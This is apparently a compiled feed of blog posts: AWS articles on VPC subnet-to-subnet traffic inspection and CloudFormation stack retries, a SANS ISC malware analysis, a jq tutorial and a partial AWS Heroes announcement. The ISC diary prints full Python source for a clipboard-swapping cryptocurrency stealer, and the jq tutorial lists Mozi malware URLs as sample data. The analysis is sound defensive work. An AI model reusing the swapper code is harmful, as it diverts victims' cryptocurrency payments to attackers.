(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Inspect Subnet to Subnet traffic with Amazon VPC More Specific Routing

Since December 2019, Amazon Virtual Private Cloud (VPC) has allowed you to route all ingress traffic (also known as north – south traffic) to a specific network interface. You might use this capability for a number of reasons. For example, to inspect incoming traffic using an intrusion detection system (IDS) appliance or to route ingress traffic to a firewall.

Since we launched this feature, many of you have asked us to provide a similar capability to analyze traffic flowing from one subnet to another inside your VPC, also known as east-west traffic. Until today, it was not possible because a route in a routing table could not be more specific than the default local route (check the VPC documentation for more details). In plain English, it means that no route could have a destination using a smaller CIDR range than the default local route (which is the CIDR range of the whole VPC). For example, when the VPC range is 10.0.0.0/16 and a subnet is 10.0.1.0/24, a route to 10.0.1.0/24 is more specific than a route to 10.0.0.0/16.
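The notion of "more specific" can be checked programmatically. Here is a small sketch using Python's standard ipaddress module, with the same CIDR values as the example above:

```python
import ipaddress

vpc = ipaddress.ip_network("10.0.0.0/16")     # default local route (the whole VPC)
subnet = ipaddress.ip_network("10.0.1.0/24")  # one subnet inside that VPC

# A /24 inside a /16 is "more specific": longer prefix, fewer addresses.
print(subnet.subnet_of(vpc))            # True
print(subnet.prefixlen > vpc.prefixlen) # True
```

When several routes match a destination, the longest prefix wins, which is why a 10.0.1.0/24 route can now override the local 10.0.0.0/16 route for traffic to that subnet.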

Routing tables no longer have this restriction. Routes in a routing table can now be more specific than the default local route. You can use such a more specific route to send all traffic to a dedicated appliance or service to inspect, analyze, or filter all traffic flowing between two subnets (east-west traffic). The route target can be the network interface (ENI) attached to an appliance you built or acquired, an AWS Gateway Load Balancer (GWLB) endpoint to distribute traffic to multiple appliances for performance or high availability reasons, an AWS Firewall Manager endpoint, or a NAT gateway. It also allows you to insert an appliance between a subnet and an AWS Transit Gateway.

It is possible to chain appliances to perform more than one type of analysis between source and destination subnets. For example, you might first filter traffic using a firewall (AWS managed or a third-party firewall appliance), then send the traffic to an intrusion detection and prevention system, and finally perform deep packet inspection. You can access virtual appliances from our AWS Partner Network and AWS Marketplace.

When you chain appliances, each appliance and each endpoint have to be in separate subnets.

Let’s get our hands dirty and try this new capability.

How It Works
For the purpose of this blog post, let’s assume I have a VPC with three subnets. The first subnet is public and has a bastion host. It requires access to resources, such as an API or a database in the second subnet. The second subnet is private. It hosts the resources required by the bastion. I wrote a simple CDK script to help you to deploy this setup.

VPC More Specific Routing

For compliance reasons, my company requires that traffic to this private application flows through an intrusion detection system. The CDK script also creates a third, private subnet to host a network appliance. It provisions three Amazon Elastic Compute Cloud (Amazon EC2) instances: the bastion host, the application instance, and the network analysis appliance. The script also creates a NAT gateway that allows bootstrapping the application instance and connecting to the three instances using AWS Systems Manager Session Manager (SSM).

Because this is a demo, the network appliance is just a regular Amazon Linux EC2 instance configured as an IP router. In real life, you’re most probably going to use either one of the many appliances provided by our partners on the AWS Marketplace, or a Gateway Load Balancer endpoint, or a Network Firewall.

Let’s modify the routing tables to send the traffic through the appliance.

Using either the AWS Management Console, or the AWS Command Line Interface (CLI), I add a more specific route to the 10.0.0.0/24 and 10.0.1.0/24 subnet routing tables. These routes point to eni0, the network interface of the traffic-inspection appliance.

Using the CLI, I first collect the VPC ID, Subnet IDs, routing table IDs, and the ENI ID of the appliance.

VPC_ID=$(aws \
    --region $REGION cloudformation describe-stacks \
    --stack-name SpecificRoutingDemoStack \
    --query "Stacks[].Outputs[?OutputKey=='VPCID'].OutputValue" \
    --output text)
echo $VPC_ID

APPLICATION_SUBNET_ID=$(aws \
    --region $REGION ec2 describe-instances \
    --query "Reservations[].Instances[] | [?Tags[?Key=='Name' && Value=='application']].NetworkInterfaces[].SubnetId" \
    --output text)
echo $APPLICATION_SUBNET_ID

APPLICATION_SUBNET_ROUTE_TABLE=$(aws \
    --region $REGION ec2 describe-route-tables \
    --query "RouteTables[?VpcId=='${VPC_ID}'] | [?Associations[?SubnetId=='${APPLICATION_SUBNET_ID}']].RouteTableId" \
    --output text)
echo $APPLICATION_SUBNET_ROUTE_TABLE

APPLIANCE_ENI_ID=$(aws \
    --region $REGION ec2 describe-instances \
    --query "Reservations[].Instances[] | [?Tags[?Key=='Name' && Value=='appliance']].NetworkInterfaces[].NetworkInterfaceId" \
    --output text)
echo $APPLIANCE_ENI_ID

BASTION_SUBNET_ID=$(aws \
    --region $REGION ec2 describe-instances \
    --query "Reservations[].Instances[] | [?Tags[?Key=='Name' && Value=='BastionHost']].NetworkInterfaces[].SubnetId" \
    --output text)
echo $BASTION_SUBNET_ID

BASTION_SUBNET_ROUTE_TABLE=$(aws \
    --region $REGION ec2 describe-route-tables \
    --query "RouteTables[?VpcId=='${VPC_ID}'] | [?Associations[?SubnetId=='${BASTION_SUBNET_ID}']].RouteTableId" \
    --output text)
echo $BASTION_SUBNET_ROUTE_TABLE

Next, I add the two more specific routes. One route sends traffic from the bastion public subnet to the application private subnet through the appliance network interface. The second route handles the replies: it routes traffic from the application private subnet to the bastion public subnet through the appliance network interface. Confused? Let’s look at the following diagram:

VPC More Specific Routing

First, let’s modify the bastion routing table:

aws ec2 create-route \
     --region $REGION \
     --route-table-id $BASTION_SUBNET_ROUTE_TABLE \
     --destination-cidr-block 10.0.1.0/24 \
     --network-interface-id $APPLIANCE_ENI_ID

Next, let’s modify the application routing table:

aws ec2 create-route \
    --region $REGION \
    --route-table-id $APPLICATION_SUBNET_ROUTE_TABLE \
    --destination-cidr-block 10.0.0.0/24 \
    --network-interface-id $APPLIANCE_ENI_ID

I can also use the Amazon VPC Console to make these modifications. I simply choose the “Bastion” routing table and, from the Routes tab, click Edit routes.

MSR : Select a routing table

I add a route to send traffic for 10.0.1.0/24 (the subnet of the application) to the appliance ENI (eni-055...).

MSR : create a route

The next step is to define the opposite route for replies: from the application subnet, send traffic destined for 10.0.0.0/24 to the appliance ENI (eni-05...).  Once finished, the application subnet routing table should look like this:

MSR : Final route table

Configure the Appliance Instance
Finally, I configure the appliance instance to forward all traffic it receives. Your software appliance usually does that for you. No extra step is required when you use AWS Marketplace appliances or the instance created by the CDK script I provided for this demo. If you’re using a plain Linux instance, complete these two extra steps:

1. Connect to the EC2 appliance instance and configure IP traffic forwarding in the kernel:

sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1

2. Configure the EC2 instance to accept traffic for destinations other than itself (this is known as the source/destination check):

APPLIANCE_ID=$(aws --region $REGION ec2 describe-instances \
     --filter "Name=tag:Name,Values=appliance" \
     --query "Reservations[].Instances[?State.Name == 'running'].InstanceId[]" \
     --output text)

aws ec2 modify-instance-attribute --region $REGION \
                         --no-source-dest-check \
                         --instance-id $APPLIANCE_ID

Test the Setup
The appliance is now ready to forward traffic to the other EC2 instances.

If you are using the demo setup, there is no SSH key installed on the bastion host. Access is made through AWS Systems Manager Session Manager.

BASTION_ID=$(aws --region $REGION ec2 describe-instances \
    --filter "Name=tag:Name,Values=BastionHost" \
    --query "Reservations[].Instances[?State.Name == 'running'].InstanceId[]" \
    --output text)

aws --region $REGION ssm start-session --target $BASTION_ID

After you’re connected to the bastion host, issue the following cURL command to connect to the application host:

sh-4.2$ curl -I 10.0.1.239 # use the private IP address of your application host
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 24 May 2021 10:00:22 GMT
Content-Type: text/html
Content-Length: 12338
Last-Modified: Mon, 24 May 2021 09:36:49 GMT
Connection: keep-alive
ETag: "60ab73b1-3032"
Accept-Ranges: bytes

To verify the traffic is really flowing through the appliance, you can enable source/destination check on the instance again. Use the --source-dest-check parameter with the modify-instance-attribute CLI command above. The traffic is blocked when the source/destination check is enabled.

I can also connect to the appliance host and inspect traffic with the tcpdump command.

(on your laptop)
APPLIANCE_ID=$(aws --region $REGION ec2 describe-instances \
                   --filter "Name=tag:Name,Values=appliance" \
                   --query "Reservations[].Instances[?State.Name == 'running'].InstanceId[]" \
                   --output text)

aws --region $REGION ssm start-session --target $APPLIANCE_ID

(on the appliance host)
tcpdump -i eth0 host 10.0.0.16 # the private IP address of the bastion host

08:53:22.760055 IP ip-10-0-0-16.us-west-2.compute.internal.46934 > ip-10-0-1-104.us-west-2.compute.internal.http: Flags [S], seq 1077227105, win 26883, options [mss 8961,sackOK,TS val 1954932042 ecr 0,nop,wscale 6], length 0
08:53:22.760073 IP ip-10-0-0-16.us-west-2.compute.internal.46934 > ip-10-0-1-104.us-west-2.compute.internal.http: Flags [S], seq 1077227105, win 26883, options [mss 8961,sackOK,TS val 1954932042 ecr 0,nop,wscale 6], length 0
08:53:22.760322 IP ip-10-0-1-104.us-west-2.compute.internal.http > ip-10-0-0-16.us-west-2.compute.internal.46934: Flags [S.], seq 4152624111, ack 1077227106, win 26847, options [mss 8961,sackOK,TS val 4094021737 ecr 1954932042,nop,wscale 6], length 0
08:53:22.760329 IP ip-10-0-1-104.us-west-2.compute.internal.http > ip-10-0-0-16.us-west-2.compute.internal.46934: Flags [S.], seq 4152624111, ack 1077227106, win 26847, options [mss 

Cleanup
If you used the CDK script I provided for this post, be sure to run cdk destroy when you’re finished so that you’re not billed for the three EC2 instances and the NAT gateway I use for this demo. Running the demo script in us-west-2 costs $0.062 per hour.

Things to Keep in Mind
There are a couple of things to keep in mind when using VPC more specific routes:

  • The network interface or service endpoint you are sending the traffic to must be in a dedicated subnet. It cannot be in the source or destination subnet of your traffic.
  • You can chain appliances. Each appliance must live in its own dedicated subnet.
  • Each subnet you add consumes a block of IP addresses.  If you’re using IPv4, be conscious of the number of IP addresses consumed (a /24 subnet consumes 256 addresses from your VPC). The smallest CIDR range allowed for a subnet is /28, which consumes just 16 IP addresses.
  • The appliance’s security group must have a rule accepting incoming traffic on the desired port. Similarly, the application’s security group must authorize traffic coming from the appliance security group or IP address.
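The address cost of each extra subnet is easy to compute with Python's standard ipaddress module (keep in mind that AWS additionally reserves five addresses in every subnet, so usable capacity is slightly lower; the CIDR values below are arbitrary examples):

```python
import ipaddress

# Compare the address consumption of a /24 subnet versus a /28 subnet.
for prefix in ("10.0.2.0/24", "10.0.3.0/28"):
    net = ipaddress.ip_network(prefix)
    print(f"{prefix}: {net.num_addresses} addresses")
# 10.0.2.0/24: 256 addresses
# 10.0.3.0/28: 16 addresses
```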

This new capability is available in all AWS Regions, at no additional cost.

You can start using it today.

New for AWS CloudFormation – Quickly Retry Stack Operations from the Point of Failure

One of the great advantages of cloud computing is that you have access to programmable infrastructure. This allows you to manage your infrastructure as code and apply the same practices of application code development to infrastructure provisioning.

AWS CloudFormation gives you an easy way to model a collection of related AWS and third-party resources, provision them quickly and consistently, and manage them throughout their lifecycles. A CloudFormation template describes your desired resources and their dependencies so you can launch and configure them together as a stack. You can use a template to create, update, and delete an entire stack as a single unit instead of managing resources individually.

When you create or update a stack, your action might fail for different reasons. For example, there can be errors in the template, in the parameters of the template, or issues outside the template, such as AWS Identity and Access Management (IAM) permission errors. When such an error occurs, CloudFormation rolls back the stack to the previous stable condition. For a stack creation, that means deleting all resources created up to the point of the error. For a stack update, it means restoring the previous configuration.

This rollback to the previous state is great for production environments, but doesn’t make it easy to understand the reason for the error. Depending on the complexity of your template and the number of resources involved, you might spend lots of time waiting for all the resources to roll back before you can update the template with the right configuration and retry the operation.

Today, I am happy to share that now CloudFormation allows you to disable the automatic rollback, keep the resources successfully created or updated before the error occurs, and retry stack operations from the point of failure. In this way, you can quickly iterate to fix and remediate errors and greatly reduce the time required to test a CloudFormation template in a development environment. You can apply this new capability when you create a stack, when you update a stack, and when you execute a change set. Let’s see how this works in practice.

Quickly Iterate to Fix and Remediate a CloudFormation Stack
For one of my applications, I need to set up an Amazon Simple Storage Service (Amazon S3) bucket, an Amazon Simple Queue Service (SQS) queue, and an Amazon DynamoDB table that is streaming item-level changes to an Amazon Kinesis data stream. For this setup, I write down the first version of the CloudFormation template.

AWSTemplateFormatVersion: "2010-09-09"
Description: A sample template to fix & remediate
Parameters:
  ShardCountParameter:
    Type: Number
    Description: The number of shards for the Kinesis stream
Resources:
  MyBucket:
    Type: AWS::S3::Bucket
  MyQueue:
    Type: AWS::SQS::Queue
  MyStream:
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: !Ref ShardCountParameter
  MyTable:
    Type: AWS::DynamoDB::Table
    Properties:
      BillingMode: PAY_PER_REQUEST
      AttributeDefinitions:
        - AttributeName: "ArtistId"
          AttributeType: "S"
        - AttributeName: "Concert"
          AttributeType: "S"
        - AttributeName: "TicketSales"
          AttributeType: "S"
      KeySchema:
        - AttributeName: "ArtistId"
          KeyType: "HASH"
        - AttributeName: "Concert"
          KeyType: "RANGE"
      KinesisStreamSpecification:
        StreamArn: !GetAtt MyStream.Arn
Outputs:
  BucketName:
    Value: !Ref MyBucket
    Description: The name of my S3 bucket
  QueueName:
    Value: !GetAtt MyQueue.QueueName
    Description: The name of my SQS queue
  StreamName:
    Value: !Ref MyStream
    Description: The name of my Kinesis stream
  TableName:
    Value: !Ref MyTable
    Description: The name of my DynamoDB table

Now, I want to create a stack from this template. On the CloudFormation console, I choose Create stack. Then, I upload the template file and choose Next.

Console screenshot.

I enter a name for the stack. Then, I fill in the stack parameters. My template file has one parameter (ShardCountParameter) used to configure the number of shards for the Kinesis data stream. I know that the number of shards should be greater than or equal to one but, by mistake, I enter zero and choose Next.

Console screenshot.

To create, modify, or delete resources in the stack, I use an IAM role. In this way, I have a clear boundary for the permissions that CloudFormation can use for stack operations. Also, I can use the same role to automate the deployment of the stack later in a standardized and reproducible environment.

In Permissions, I select the IAM role to use for the stack operations.

Console screenshot.

Now it’s time to use the new feature! In the Stack failure options, I select Preserve successfully provisioned resources to keep, in case of errors, the resources that have already been created. Failed resources are always rolled back to the last known stable state.

Console screenshot.

I leave all other options at their defaults and choose Next. Then, I review my configurations and choose Create stack.

The creation of the stack is in progress for a few seconds, and then it fails because of an error. In the Events tab, I look at the timeline of the events. The start of the creation of the stack is at the bottom. The most recent event is at the top. Properties validation for the stream resource failed because the number of shards (ShardCount) is below the minimum. For this reason, the stack is now in the CREATE_FAILED status.

Console screenshot.

Because I chose to preserve the provisioned resources, all resources created before the error are still there. In the Resources tab, the S3 bucket and the SQS queue are in the CREATE_COMPLETE status, while the Kinesis data stream is in the CREATE_FAILED status. The creation of the DynamoDB table depends on the Kinesis data stream to be available because the table uses the data stream in one of its properties (KinesisStreamSpecification). As a consequence of that, the table creation has not started yet, and the table is not in the list.

Console screenshot.

The rollback is now paused, and I have a few new options:

Retry – To retry the stack operation without any change. This option is useful if a resource failed to provision due to an issue outside the template. I can fix the issue and then retry from the point of failure.

Update – To update the template or the parameters before retrying the stack creation. The stack update starts from where the last operation was interrupted by an error.

Rollback – To roll back to the last known stable state. This is similar to default CloudFormation behavior.

Console screenshot.

Fixing Issues in the Parameters
I quickly realize the mistake I made while entering the parameter for the number of shards, so I choose Update.

I don’t need to change the template to fix this error. In Parameters, I fix the previous error and enter the correct amount for the number of shards: one shard.

Console screenshot.

I leave all other options at their current values and choose Next.

In Change set preview, I see that the update will try to modify the Kinesis stream (currently in the CREATE_FAILED status) and add the DynamoDB table. I review the other configurations and choose Update stack.

Console screenshot.

Now the update is in progress. Did I solve all the issues? Not yet. After some time, the update fails.

Fixing Issues Outside the Template
The Kinesis stream has been created, but the IAM role assumed by CloudFormation doesn’t have permissions to create the DynamoDB table.

Console screenshots.

In the IAM console, I add additional permissions to the role used by the stack operations to be able to create the DynamoDB table.

Console screenshot.

Back to the CloudFormation console, I choose the Retry option. With the new permissions, the creation of the DynamoDB table starts, but after some time, there is another error.

Fixing Issues in the Template
This time there is an error in my template where I define the DynamoDB table. In the AttributeDefinitions section, there is an attribute (TicketSales) that is not used in the schema.

Console screenshot.

With DynamoDB, attributes defined in the template should be used either for the primary key or for an index. I update the template and remove the TicketSales attribute definition.

Because I am editing the template, I take the opportunity to also add MinValue and MaxValue properties to the number of shards parameter (ShardCountParameter). In this way, CloudFormation can check that the value is in the correct range before starting the deployment, and I can avoid further mistakes.

I select the Update option. I choose to update the current template, and I upload the new template file. I confirm the current values for the parameters. Then, I leave all other options to their current values and choose Update stack.

This time, the update of the stack is successful, and the status is UPDATE_COMPLETE. I can see all resources in the Resources tab and their description (based on the Outputs section of the template) in the Outputs tab.

Console screenshot.

Here’s the final version of the template:

AWSTemplateFormatVersion: "2010-09-09"
Description: A sample template to fix & remediate
Parameters:
  ShardCountParameter:
    Type: Number
    MinValue: 1
    MaxValue: 10
    Description: The number of shards for the Kinesis stream
Resources:
  MyBucket:
    Type: AWS::S3::Bucket
  MyQueue:
    Type: AWS::SQS::Queue
  MyStream:
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: !Ref ShardCountParameter
  MyTable:
    Type: AWS::DynamoDB::Table
    Properties:
      BillingMode: PAY_PER_REQUEST
      AttributeDefinitions:
        - AttributeName: "ArtistId"
          AttributeType: "S"
        - AttributeName: "Concert"
          AttributeType: "S"
      KeySchema:
        - AttributeName: "ArtistId"
          KeyType: "HASH"
        - AttributeName: "Concert"
          KeyType: "RANGE"
      KinesisStreamSpecification:
        StreamArn: !GetAtt MyStream.Arn
Outputs:
  BucketName:
    Value: !Ref MyBucket
    Description: The name of my S3 bucket
  QueueName:
    Value: !GetAtt MyQueue.QueueName
    Description: The name of my SQS queue
  StreamName:
    Value: !Ref MyStream
    Description: The name of my Kinesis stream
  TableName:
    Value: !Ref MyTable
    Description: The name of my DynamoDB table

This was a simple example, but the new capability to retry stack operations from the point of failure already saved me lots of time. It allowed me to fix and remediate issues quickly, reducing the feedback loop and increasing the number of iterations that I can do in the same amount of time. In addition to using this for debugging, it is also great for incremental interactive development of templates. With more sophisticated applications, the time saved will be huge!

Fix and Remediate a CloudFormation Stack Using the AWS CLI
I can preserve successfully provisioned resources with the AWS Command Line Interface (CLI) by specifying the --disable-rollback option when I create a stack, update a stack, or execute a change set. For example:

aws cloudformation create-stack --stack-name my-stack \
    --template-body file://my-template.yaml --disable-rollback

aws cloudformation update-stack --stack-name my-stack \
    --template-body file://my-template.yaml --disable-rollback

aws cloudformation execute-change-set --stack-name my-stack \
    --change-set-name my-change-set --disable-rollback

For an existing stack, I can see if the DisableRollback property is enabled with the describe-stacks command:

aws cloudformation describe-stacks --stack-name my-stack
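The flag appears in the command's JSON output. Here is a minimal Python sketch of pulling it out of a captured response; the sample below is abbreviated, hypothetical data rather than a live API call:

```python
import json

# Abbreviated, hypothetical describe-stacks output for illustration only.
captured = '''{
  "Stacks": [
    {"StackName": "my-stack",
     "StackStatus": "CREATE_FAILED",
     "DisableRollback": true}
  ]
}'''

response = json.loads(captured)
disable_rollback = response["Stacks"][0]["DisableRollback"]
print(disable_rollback)  # True
```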

I can now update stacks in the CREATE_FAILED or UPDATE_FAILED status. To manually roll back a stack that is in the CREATE_FAILED or UPDATE_FAILED status, I can use the new rollback stack command:

aws cloudformation rollback-stack --stack-name my-stack

Availability and Pricing
The capability for AWS CloudFormation to retry stack operations from the point of failure is available at no additional charge in the following AWS Regions: US East (N. Virginia, Ohio), US West (Oregon, N. California), AWS GovCloud (US-East, US-West), Canada (Central), Europe (Frankfurt, Ireland, London, Milan, Paris, Stockholm), Asia Pacific (Hong Kong, Mumbai, Osaka, Seoul, Singapore, Sydney, Tokyo), Middle East (Bahrain), Africa (Cape Town), and South America (São Paulo).

Do you prefer to define your cloud application resources using familiar programming languages such as JavaScript, TypeScript, Python, Java, C#, and Go? Good news! The AWS Cloud Development Kit (AWS CDK) team is planning to add support for the new capabilities described in this post in the next couple of weeks.

Spend less time to fix and remediate your CloudFormation stacks with the new capability to retry stack operations from the point of failure.

Danilo

Cryptocurrency Clipboard Swapper Delivered With Love , (Mon, Aug 30th)

Be careful if you're a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I'm talking here about technical risk. Wallet addresses are long strings of characters that are practically impossible to type manually. That means you'll use your clipboard to copy/paste wallet addresses when performing payments. But some malware monitors your clipboard for "interesting data" (like wallet addresses) and tries to replace it with another address. If you then perform a payment, you will transfer BTC or XMR to the wrong wallet, one owned by the attacker.

Yesterday, I spotted a simple malicious Python script that performs exactly this. The script SHA256 is ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343 and it has a current detection score of 17/57 [1]. The main code is obfuscated in a Base64-encoded variable.

As you can see in the code below, this script is delivered with love to the victim! Random love quotes are added to the script to defeat some automated analysis. The script is based on the pyperclip [2] library, which is common in the Python ecosystem and allows manipulating the clipboard. The fact that the script does not test whether the module is already installed makes me think that it is part of a framework or has dependencies on other components.

The clipboard is checked at regular intervals and searched for classic cryptocurrency addresses using regular expressions. If there is a match, the clipboard content is swapped with a rogue wallet address. Two are defined in this sample.

Here is the code:

#If I know what love is
import pyperclip
#I fell in love with her courage
import json
#If you live to be a hundred
import time
#A man is already halfway in love
import re
#Women are meant to be loved
import argparse
#You make me want to be a better man
from datetime import datetime
#Thinking of you keeps me

def main():
    # infinite keeps me
    while 1:
        now = datetime.now()
        
        time.sleep(2)  #Let me love you
        #There is never a time or place for true love
        user_clipboard = pyperclip.paste()
        #true love
        crypto_found = spiff(
            user_clipboard
        )  
        replacement_address = replace(
            user_clipboard, crypto_found
        )  
#love is so short, forgetting is so long
        
master_addresses = {
  "btc": "xxxxxxxxxx",
  "xmr": "null",
  "eth": "xxxxxxxxxx",
  "dash": "null",
  "xrp": "null",
  "doge": "null",
  "ada": "null",
  "lite": "null",
  "dot": "null",
  "tron": "null"
}
#cares and fears
def replace(user_clipboard, crypto_found):

    if crypto_found != 0 and master_addresses[crypto_found] != "null":
        pyperclip.copy(master_addresses[crypto_found])
        return str(master_addresses[crypto_found])
    return 0
#until love’s vulnerable

def spiff(user_clipboard):
    crypto_regex_match = {
        "btc": "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$",
        "xmr": "4[0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}",
        "eth": "^0x[a-fA-F0-9]{40}$",
        "dash": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
        "xrp": "^r[0-9a-zA-Z]{24,34}$",
        "doge": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
        "ada": "^D[A-NP-Za-km-z1-9]{35,}$",
        "lite": "^[LM3][a-km-zA-HJ-NP-Z1-9]{25,34}$",
        "tron": "^T[a-zA-Z0-9]{33}$",
        "dot": "^[1-9A-HJ-NP-Za-km-z]*$",
    }
    #I love you without knowing how
    for k, v in crypto_regex_match.items():
        if bool(re.search(v, user_clipboard)):
            return str(k)

    return 0
    #A purpose of human life

main()
#Love is always patient and kind

I checked the two wallets in the script, but they don't show any transactions at this time.
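The regex-based detection in the script's spiff() function is easy to exercise in isolation. A quick sanity check of its BTC pattern against the well-known Bitcoin genesis-block address (used here purely as benign test data):

```python
import re

# BTC pattern taken from the malware's spiff() function.
btc_pattern = r"^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$"

sample = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"  # Bitcoin genesis address
print(bool(re.search(btc_pattern, sample)))    # True
```

Any clipboard content matching a pattern like this would be silently replaced, which is why it pays to re-read a pasted wallet address before confirming a transaction.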

[Update 1]

Brian Krebs contacted me to report a story he posted a few days ago about a real case of such a clipboard swapping technique[3]. This article is worth reading!

[1] https://www.virustotal.com/gui/file/ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343/detection
[2] https://pypi.org/project/pyperclip/
[3] https://krebsonsecurity.com/2021/08/man-robbed-of-16-bitcoin-sues-young-thieves-parents/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Filter JSON Data by Value with Linux jq, (Sun, Aug 29th)

JSON has become more prevalent as a data service, but unfortunately it isn't at all BASH friendly, and manipulating JSON data at the command line with REGEX (i.e. sed, grep, etc.) is cumbersome and makes it difficult to get the output I want.

So, there is a Linux tool I use for this: jq, a tool specifically written to manipulate and filter the data I want (i.e. like scripting to extract the output I need) from a large JSON file, in an output format I can easily read and work with.

The most common form of logs I work with is the JSON array (it starts and ends with []). Here is a basic example demonstrating how to iterate over an array:

echo '["a","b","c"]' | jq '.[]'

Using the value iterator operator .[], jq prints each item in the array on a separate line:

"a"
"b"
"c"
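
As a point of comparison, here is a rough Python equivalent of that iteration, using only the standard library:

```python
import json

# jq's .[] iterates over every value in the input array;
# the Python equivalent is simply looping over the parsed list.
data = json.loads('["a","b","c"]')
for item in data:
    # json.dumps keeps the double quotes, matching jq's output.
    print(json.dumps(item))
```

This prints "a", "b", and "c" on separate lines, just like the jq one-liner.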

In this next example, I take the data from the bot_ip.json file and parse out the list of IP addresses along with the site each one came from:

cat bot_ip.json | jq '.objects[].ip + ": " + .objects[].source' | sort | uniq

The output looks like this:

"212.39.114.139: Botscout BOT IPs"
"216.131.104.82: Botscout BOT IPs"
"2607:90:6628:470:0:4:0:801: Botscout BOT IPs"

Since this file wraps the array in an objects key before the opening [, I use that key as the anchor to start parsing the data I want to see. I also added a colon (:) separator between the IP and the data source.
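
jq isn't the only way to get this output. Assuming bot_ip.json has a top-level "objects" array whose records carry "ip" and "source" fields (the raw file isn't reproduced here, so the snippet below is a hypothetical stand-in), the same filter can be sketched in Python:

```python
import json

# Hypothetical snippet mirroring the assumed structure of bot_ip.json:
# a top-level "objects" key holding a list of records.
raw = '''{"objects": [
  {"ip": "216.131.104.82", "source": "Botscout BOT IPs"},
  {"ip": "212.39.114.139", "source": "Botscout BOT IPs"},
  {"ip": "212.39.114.139", "source": "Botscout BOT IPs"}
]}'''

data = json.loads(raw)
# Equivalent of: jq '.objects[].ip + ": " + .objects[].source' | sort | uniq
# (the set comprehension handles the "uniq" part, sorted() the "sort" part)
lines = sorted({obj["ip"] + ": " + obj["source"] for obj in data["objects"]})
for line in lines:
    print(line)
```

The set comprehension deduplicates repeated records the same way piping through sort | uniq does at the shell.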

This second example uses mal_url.json, which contains known malware URL locations:

cat mal_url.json | jq '.objects[].value + ": " + .objects[].source + ": " + .objects[].threat_type' | sort | uniq

"http://103.82.81.37:42595/Mozi.a: URLHaus: malware"
"http://103.84.240.226:45940/Mozi.m: URLHaus: malware"
"http://110.178.73.97:34004/Mozi.m: URLHaus: malware"

Next is a larger test file [2] that contains several records that can be used to practice manipulating JSON data. Using wget, download the file to a Linux workstation and ensure that jq is installed (e.g. on CentOS: yum -y install jq). Then take a quick look at the raw file using a Linux command of your choice (less, more, cat, etc.) before parsing some of the data with jq. To view the data properly formatted and readable, use this command:

cat large-file.json | jq | more

To get a list of actors with their current information, run this command:

cat large-file.json | jq '.[].actor' | more

To get just the list of actor login information, add .login to .actor:

cat large-file.json | jq '.[].actor.login' | more
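
For comparison, the nested .actor.login lookup can be sketched in Python against a couple of hypothetical records shaped like the GitHub events in large-file.json (the field values below are made up for illustration):

```python
import json

# Hypothetical records: each element carries an "actor" object
# with a "login" field, as in the large-file.json test data.
raw = '''[
  {"id": "1", "actor": {"id": 101, "login": "alice"}},
  {"id": "2", "actor": {"id": 102, "login": "bob"}}
]'''

events = json.loads(raw)
# Equivalent of: jq '.[].actor.login'
logins = [event["actor"]["login"] for event in events]
for login in logins:
    print(login)
```

Chaining keys in jq (.actor.login) maps directly onto chained dictionary lookups in Python.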

What are some of your favorite tools to manipulate JSON data?

[1] https://stedolan.github.io/jq/manual/
[2] https://github.com/json-iterator/test-data/raw/master/large-file.json
[3] https://gchq.github.io/CyberChef/
[4] http://iplists.firehol.org/?ipset=botscout

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing the latest AWS Heroes – August 2021

This post was originally published on this site

AWS Heroes go above and beyond to share knowledge with the community and help others build better and faster on AWS. Last month we launched the AWS Heroes Content Library, a centralized place where Builders can find inspiration and learn from AWS Hero authored educational content including blogs, videos, slide presentations, podcasts, open source projects, and more. As technical communities evolve new Heroes continue to emerge, and each quarter we recognize an outstanding group of individuals from around the world whose impact on community knowledge-sharing is significant and greatly appreciated.

Today we are pleased to introduce the newest AWS Heroes, including the first Heroes based in Cameroon and Malaysia:

Denis Astahov – Vancouver, Canada

Community Hero Denis Astahov is a Solutions Architect at OpsGuru, where he automates and develops various cloud solutions with Infrastructure as Code using Terraform. Denis owns the YouTube channel ADV-IT, where he teaches people about a variety of IT and especially DevOps topics, including AWS, Terraform, Kubernetes, Ansible, Jenkins, Git, Linux, Python, and many others. His channel has more than 70,000 subscribers and over 7,000,000 views, making it one of the most popular free sources for AWS and DevOps knowledge in the Russian-speaking community. Denis has more than 10 cloud certifications, including 7 AWS Certifications.

Ivonne Roberts – Tampa, USA

Serverless Hero Ivonne Roberts is a Principal Software Engineer with over fifteen years of software development experience, including ten years working with AWS and more than five years building serverless applications. In recent years, Ivonne has begun sharing that industry knowledge with the greater software engineering community. On her blog ivonneroberts.com and her YouTube channel Serverless DevWidgets, Ivonne focuses on demystifying and removing the hurdles of adopting serverless architecture and on simplifying the software development lifecycle.

Kaushik Mohanraj – Kuala Lumpur, Malaysia

Community Hero Kaushik Mohanraj is a Director at Blazeclan Technologies, Malaysia. An avid cloud practitioner, Kaushik has experience in the evaluation of well-architected solutions and is an ambassador for cloud technologies and digital transformation. Kaushik holds 10 active AWS Certifications, which help him to provide relevant and optimal solutions. Kaushik is keen to build a community he thrives in and hence joined AWS User Group Malaysia as a co-organizer in 2019. He is also the co-director of Women in Big Data – Malaysia Chapter, with an aim to build and provide a platform for women in technology.

